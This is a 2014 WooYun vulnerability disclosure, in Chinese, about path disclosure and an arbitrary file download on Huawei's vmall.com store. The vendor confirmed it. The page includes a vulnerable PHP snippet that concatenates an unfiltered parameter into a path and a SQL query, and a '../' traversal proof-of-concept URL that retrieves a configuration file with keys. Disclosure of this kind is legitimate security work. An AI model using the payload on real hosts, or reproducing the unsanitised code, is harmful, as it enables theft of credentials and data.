当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056501

漏洞标题:华为商城任意文件下载+敏感数据泄漏

相关厂商:华为技术有限公司

漏洞作者: 矿主

提交时间:2014-04-10 08:53

修复时间:2014-05-25 08:54

公开时间:2014-05-25 08:54

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-10: 细节已通知厂商并且等待厂商处理中
2014-04-10: 厂商已经确认,细节仅向厂商公开
2014-04-20: 细节向核心白帽子及相关领域专家公开
2014-04-30: 细节向普通白帽子公开
2014-05-10: 细节向实习白帽子公开
2014-05-25: 细节向公众公开

简要描述:

华为商城文件下载+数据库信息泄露+路径泄露。

详细说明:

先是两枚路径泄露:

http://zh.ui.vmall.com//source/include/misc/misc_ranklist_index.php
Fatal error: Call to undefined function loadcache() in /home/emo/data/www/source/include/misc/misc_ranklist_index.php on line 2
http://activity.vmall.com/source/include/misc/misc_ranklist_index.php
Fatal error: Call to undefined function loadcache() in /home/emo/data/www/source/include/misc/misc_ranklist_index.php on line 2


download.php代码分析:

header("Content-type: application/octet-stream");
$filepath = "./resource/".$_GET['filename']; //直接使用了参数,没有过滤。
//......
$query = DB::query("SELECT filename FROM ".DB::table('emotion_download_restore_file')." WHERE filepath='".$filepath."'");
if ($archive = DB::fetch($query))
{
$filename = $archive['filename'];
}
//......

漏洞证明:

文件下载POC:http://zh.ui.vmall.com/download.php?filename=../config/config_ucenter.php

clipboard.png


能猜解很多文件:

clipboard.png

包含了很多敏感的key。

修复方案:

文件要过滤。

版权声明:转载请注明来源 矿主@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-10 11:46

厂商回复:

修完openssl的洞,接着修这个,苦逼的小伙伴辛勤劳动中。

最新状态:

暂无